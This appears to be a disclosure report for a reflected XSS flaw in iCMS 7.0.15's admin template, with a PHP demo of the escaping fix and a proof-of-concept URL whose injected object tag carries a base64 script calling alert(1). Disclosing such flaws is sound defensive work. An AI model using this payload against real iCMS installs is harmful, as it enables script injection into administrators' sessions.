A CMS on GitHub
1. Reflected XSS
In iCMS-7.0.15/app/admincp/template/admincp.access.php, line 32:

$keywords is printed directly into the response, with no output encoding.
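
The pattern and its fix, as an added illustration that is not iCMS source code: the `<input>` markup and the function names are assumptions, since the template line itself is not reproduced in this report. It renders the report's keywords value both ways and counts the `<object>` elements an HTML parser builds from each result.

```php
<?php
// Added illustration, not iCMS code. Markup and function names are assumed.

// Vulnerable pattern: the request value is echoed into an attribute as-is.
function render_unescaped(string $keywords): string
{
    return '<input type="text" name="keywords" value="' . $keywords . '" />';
}

// Hardened pattern: encode for the HTML attribute context at output time.
// ENT_QUOTES covers both quote styles; ENT_SUBSTITUTE replaces invalid UTF-8
// instead of returning an empty string.
function render_escaped(string $keywords): string
{
    $safe = htmlspecialchars($keywords, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="keywords" value="' . $safe . '" />';
}

// Count the elements a real HTML parser builds from the rendered markup.
function count_elements(string $html, string $tag): int
{
    libxml_use_internal_errors(true); // keep parser warnings out of the output
    $doc = new DOMDocument();
    $doc->loadHTML($html);
    libxml_clear_errors();
    return $doc->getElementsByTagName($tag)->length;
}

// The keywords value from this report's payload, after URL decoding.
$payload = '\\"><object data=data:text/html;base64,'
         . 'PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==></object>';

foreach (['render_unescaped', 'render_escaped'] as $render) {
    $html = $render($payload);
    printf("%-17s <object> elements parsed: %d\n", $render, count_elements($html, 'object'));
    echo $html, "\n\n";
}
```

In the escaped rendering the quote and angle brackets arrive as `&quot;`, `&lt;` and `&gt;`, so the value stays inside the attribute and no new element is created.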
Payload:
iCMS-7.0.15/app/admincp/template/admincp.access.php?keywords=\"><object+data=data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==></object>
Result:
